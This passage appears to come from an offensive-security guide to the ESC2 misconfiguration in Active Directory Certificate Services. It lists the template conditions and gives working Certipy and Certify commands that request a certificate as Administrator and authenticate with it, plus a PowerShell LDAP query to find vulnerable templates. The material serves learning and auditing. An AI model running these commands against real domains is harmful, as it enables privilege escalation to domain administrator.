ESC2

ESC2 is a variation of ESC1 and requires the following conditions to be met

• Any Purpose EKU which allows the attacker to get a certificate that can be used for all purposes (Client Authentication, Code Signing, ...)

• ENROLLEE_SUPPLIES_SUBJECT attribute enabled

• a user with enrollment rights

• manager approval turned off

To make it easier to remember, the only difference between ESC1 and ESC2 is the require EKU. If, for some reason, a certificate template is configured with no EKU, we will be able to use it just like a template with Any Purpose EKU.

Usually, certificates vulnerable to ESC2 could also be exploited with ESC1: to abuse ESC2 we need to, once again, add an alternative user in the Certificate Signing Request and authenticate with it.

certipy req -u otter -p 'SomethingSecure123!' -ca otter-CA -template ESC2 -upn Administrator

certipy auth -pfx administrator.pfx -username administrator -domain domain.com -dc-ip 10.10.10.10

We can enumerate the misconfiguration from Powershell as well

Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=domain,DC=com'

Once again, if working in a CBA-patched environment we can use Certify's (or Ceritipy's) sidextension argument

.\Certify.exe request /ca:domain.com\otter-CA /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:otter.com